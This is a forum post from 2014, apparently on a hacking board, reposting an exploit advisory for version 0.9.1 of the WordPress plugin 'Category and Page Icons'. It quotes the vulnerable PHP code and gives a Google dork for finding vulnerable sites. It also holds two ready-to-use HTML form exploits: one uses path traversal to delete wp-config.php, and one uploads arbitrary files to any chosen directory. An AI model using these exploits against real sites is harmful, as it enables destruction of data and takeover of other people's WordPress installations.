Anti-armenia.ORG - Forumlar - WordPress Plugin Category and Page Icons Multiple Vuln

Forumlar / Hacking Platform / Web Hacking & Security / WordPress Plugin Category and Page Icons Multiple Vuln

Istifadəçi

2014-09-30 12:08 GMT

Alper

İstifadəçi

Mesaj Sayı : 630

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : null

Ölkə :

Məslək :

Yaş : 130

Mesaj :

Videoda tam izah vermişəm qaranlığ qalan yer olsa PM ata bilərsiniz

Kod:
Exploit Title : WordPress Plugin 'Category and Page Icons' Multiple Vulnerabilities

Exploit Author : NULL_Pointer

Date : 2014-09-29

Download Link : https://downloads.wordpress.org/plugin/category-page-icons.zip

Version : 0.9.1

Google Dork : inurl:/wp-content/plugins/category-page-icons/

--------------------------------------------------------------

1. Arbitrary File Deletion :

The vulnerable code is located in 'include/wpdev-flash-uploader.php' :

171. $action = $_POST['ajax_action'];
172. if ( isset($action) ) {
173. switch ( $action ) :
174. case 'delete-image' :
175. $path = $_POST['file_name_dir'] . '/' . $_POST['file_name_org'];
176. $name_parts = pathinfo($path);
177. $ext = $name_parts['extension'];
178. $file_name_only = trim( substr( $name_parts['basename'], 0, -(1 + strlen($ext)) ) );
179. $path_icon = $_POST['file_name_dir'] . '/' . $file_name_only . $_POST['fileicon_size'] ;
180. if (file_exists($path)) unlink( $path );

This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files.

Exploit :

<html>
<form action="http://127.0.0.1/wp/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST">
<input type="hidden" name="ajax_action" value="delete-image">
<input type="text" name="file_name_dir" value = "../../../../">
<input type="text" name="file_name_org" value = "wp-config.php">
<input type="submit" value="Delete it">
</form>
</html>

2. Unrestricted File Upload :

This application has an upload feature that allows any user to upload arbitrary files.

Allowed Extensions : txt, htm, html, jpg, png...etc

Exploit :

<html>
<form action="http://127.0.0.1/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST" enctype="multipart/form-data">
Choose File to upload : <input type="file" name="wpdev-async-upload"><br />
Directory : <input type="text" name="dir_icons" value="../../../../"><br />
<input type="submit" value="Upload">
</form>
</html>